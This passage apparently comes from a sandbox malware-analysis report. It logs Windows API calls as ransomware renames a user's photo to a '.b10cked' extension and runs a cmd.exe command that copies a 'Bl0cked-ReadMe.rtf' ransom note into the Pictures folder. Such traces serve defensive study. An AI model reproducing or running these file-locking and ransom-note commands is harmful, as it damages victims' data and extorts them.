_wcsicmp (_String1="WO_IX7~1.JPG", _String2=".") returned 73 [0146.264] _wcsicmp (_String1="WO_IX7~1.JPG", _String2="..") returned 73 [0146.264] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7~1.jpg")) returned 0x20 [0146.264] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x401e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.264] SetErrorMode (uMode=0x0) returned 0x0 [0146.265] SetErrorMode (uMode=0x1) returned 0x0 [0146.265] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG", nBufferLength=0x104, lpBuffer=0x30eb24, lpFilePart=0x30eb0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG", lpFilePart=0x30eb0c*="WO_IX7~1.JPG") returned 0x26 [0146.265] SetErrorMode (uMode=0x0) returned 0x1 [0146.265] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures" (normalized: "c:\\users\\eebsym5\\pictures")) returned 0x13 [0146.265] _wcsicmp (_String1="WO_IX7~1.JPG", _String2=".") returned 73 [0146.265] _wcsicmp (_String1="WO_IX7~1.JPG", _String2="..") returned 73 [0146.265] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7~1.jpg")) returned 0x20 [0146.265] SetErrorMode (uMode=0x0) returned 0x0 [0146.265] SetErrorMode (uMode=0x1) returned 0x0 [0146.265] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG", nBufferLength=0x104, lpBuffer=0x30efa0, lpFilePart=0x30ed38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG", lpFilePart=0x30ed38*="WO_IX7~1.JPG") returned 0x26 [0146.265] SetErrorMode (uMode=0x0) returned 0x1 [0146.265] SetErrorMode (uMode=0x0) returned 0x0 [0146.265] SetErrorMode (uMode=0x1) returned 0x0 [0146.265] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x30f1a8, lpFilePart=0x30ed38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked", lpFilePart=0x30ed38*="wo_IX7FkjtTmLgs.jpg.b10cked") returned 0x35 [0146.265] SetErrorMode (uMode=0x0) returned 0x1 [0146.265] SetLastError (dwErrCode=0x0) [0146.265] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7fkjttmlgs.jpg.b10cked")) returned 0xffffffff [0146.266] GetLastError () returned 0x2 [0146.266] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x30e6b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e6b4) returned 0x3f0e50 [0146.266] FindNextFileW (in: hFindFile=0x3f0e50, lpFindFileData=0x30e6b4 | out: lpFindFileData=0x30e6b4) returned 0 [0146.266] GetLastError () returned 0x12 [0146.266] FindClose (in: hFindFile=0x3f0e50 | out: hFindFile=0x3f0e50) returned 1 [0146.267] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\WO_IX7~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x401bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x401bd0) returned 0x3f0e50 [0146.268] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x30e94c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked", lpFilePart=0x0) returned 0x35 [0146.268] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg", nBufferLength=0x104, lpBuffer=0x30e94c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg", lpFilePart=0x0) returned 0x2d [0146.268] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7fkjttmlgs.jpg")) returned 0x20 [0146.268] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7fkjttmlgs.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7fkjttmlgs.jpg.b10cked"), dwFlags=0x3) returned 1 [0146.268] FindClose (in: hFindFile=0x3f0e50 | out: hFindFile=0x3f0e50) returned 1 [0146.268] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30e900 | out: _Buffer=" 1") returned 9 [0146.268] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.268] GetFileType (hFile=0x7) returned 0x2 [0146.269] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0146.269] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30e88c | out: lpMode=0x30e88c) returned 1 [0146.269] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.269] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30e8c0 | out: lpConsoleScreenBufferInfo=0x30e8c0) returned 1 [0146.269] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0146.269] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30e900 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0146.270] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30e8e4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30e8e4*=0x1a) returned 1 [0146.270] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.270] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.270] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.270] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.270] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.270] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.270] SetConsoleInputExeNameW () returned 0x1 [0146.270] GetConsoleOutputCP () returned 0x1b5 [0146.270] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.271] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.271] exit (_Code=0) Process: id = "205" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b80" os_pid = "0xb18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17685 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17686 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17687 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17688 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 17689 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17690 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17691 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17692 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17693 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 17694 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17749 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17750 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17751 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17752 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17753 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 17754 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17755 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17756 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17757 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17758 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17759 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17760 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17761 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17762 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17763 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 17764 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17765 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17766 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 17767 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 17768 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 17769 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 17770 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 17771 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 17772 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 260 os_tid = 0xa9c [0146.065] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc5c | out: lpSystemTimeAsFileTime=0x16fc5c*(dwLowDateTime=0x90fea060, dwHighDateTime=0x1d440a9)) [0146.065] GetCurrentProcessId () returned 0xb18 [0146.065] GetCurrentThreadId () returned 0xa9c [0146.065] GetTickCount () returned 0x2d779 [0146.065] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc54 | out: lpPerformanceCount=0x16fc54*=20285455738) returned 1 [0146.066] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0146.066] __set_app_type (_Type=0x1) [0146.066] __p__fmode () returned 0x76b331f4 [0146.066] __p__commode () returned 0x76b331fc [0146.066] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0146.066] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0146.067] GetCurrentThreadId () returned 0xa9c [0146.067] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa9c) returned 0x38 [0146.067] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.067] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0146.067] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.067] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.067] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fbec | out: phkResult=0x16fbec*=0x0) returned 0x2 [0146.067] VirtualQuery (in: lpAddress=0x16fc23, lpBuffer=0x16fbbc, dwLength=0x1c | out: lpBuffer=0x16fbbc*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.067] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fbbc, dwLength=0x1c | out: lpBuffer=0x16fbbc*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0146.067] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fbbc, dwLength=0x1c | out: lpBuffer=0x16fbbc*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0146.067] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fbbc, dwLength=0x1c | out: lpBuffer=0x16fbbc*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.067] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fbbc, dwLength=0x1c | out: lpBuffer=0x16fbbc*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.067] GetConsoleOutputCP () returned 0x1b5 [0146.067] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.068] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0146.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.068] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0146.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.068] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.068] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.068] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.068] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.069] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0146.069] GetEnvironmentStringsW () returned 0x1b0168* [0146.069] FreeEnvironmentStringsW (penv=0x1b0168) returned 1 [0146.069] GetEnvironmentStringsW () returned 0x1b0168* [0146.069] FreeEnvironmentStringsW (penv=0x1b0168) returned 1 [0146.069] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb5c | out: phkResult=0x16eb5c*=0x40) returned 0x0 [0146.069] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x0, lpData=0x16eb68*=0x90, lpcbData=0x16eb60*=0x1000) returned 0x2 [0146.069] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x1, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.069] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x0, lpData=0x16eb68*=0x1, lpcbData=0x16eb60*=0x1000) returned 0x2 [0146.069] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x0, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.069] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x40, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.069] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x40, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x0, lpData=0x16eb68*=0x40, lpcbData=0x16eb60*=0x1000) returned 0x2 [0146.070] RegCloseKey (hKey=0x40) returned 0x0 [0146.070] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb5c | out: phkResult=0x16eb5c*=0x40) returned 0x0 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x0, lpData=0x16eb68*=0x40, lpcbData=0x16eb60*=0x1000) returned 0x2 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x1, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x0, lpData=0x16eb68*=0x1, lpcbData=0x16eb60*=0x1000) returned 0x2 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x0, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x9, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x9, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x0, lpData=0x16eb68*=0x9, lpcbData=0x16eb60*=0x1000) returned 0x2 [0146.070] RegCloseKey (hKey=0x40) returned 0x0 [0146.070] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886374 [0146.070] srand (_Seed=0x5b886374) [0146.070] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"" [0146.070] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"" [0146.070] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.071] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0146.071] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.071] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.071] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.071] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0146.071] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0146.071] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0146.071] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0146.071] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0146.071] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0146.071] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0146.071] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0146.071] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0146.071] GetEnvironmentStringsW () returned 0x1b22b8* [0146.071] FreeEnvironmentStringsW (penv=0x1b22b8) returned 1 [0146.071] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.072] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.072] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0146.072] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0146.072] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0146.072] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0146.072] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0146.072] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0146.072] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0146.072] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0146.072] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f928 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.072] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f928, lpFilePart=0x16f924 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f924*="Desktop") returned 0x18 [0146.072] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.072] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f6a4 | out: lpFindFileData=0x16f6a4) returned 0x1afff8 [0146.072] FindClose (in: hFindFile=0x1afff8 | out: hFindFile=0x1afff8) returned 1 [0146.072] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f6a4 | out: lpFindFileData=0x16f6a4) returned 0x1afff8 [0146.073] FindClose (in: hFindFile=0x1afff8 | out: hFindFile=0x1afff8) returned 1 [0146.073] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f6a4 | out: lpFindFileData=0x16f6a4) returned 0x1afff8 [0146.073] FindClose (in: hFindFile=0x1afff8 | out: hFindFile=0x1afff8) returned 1 [0146.073] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.073] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0146.073] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 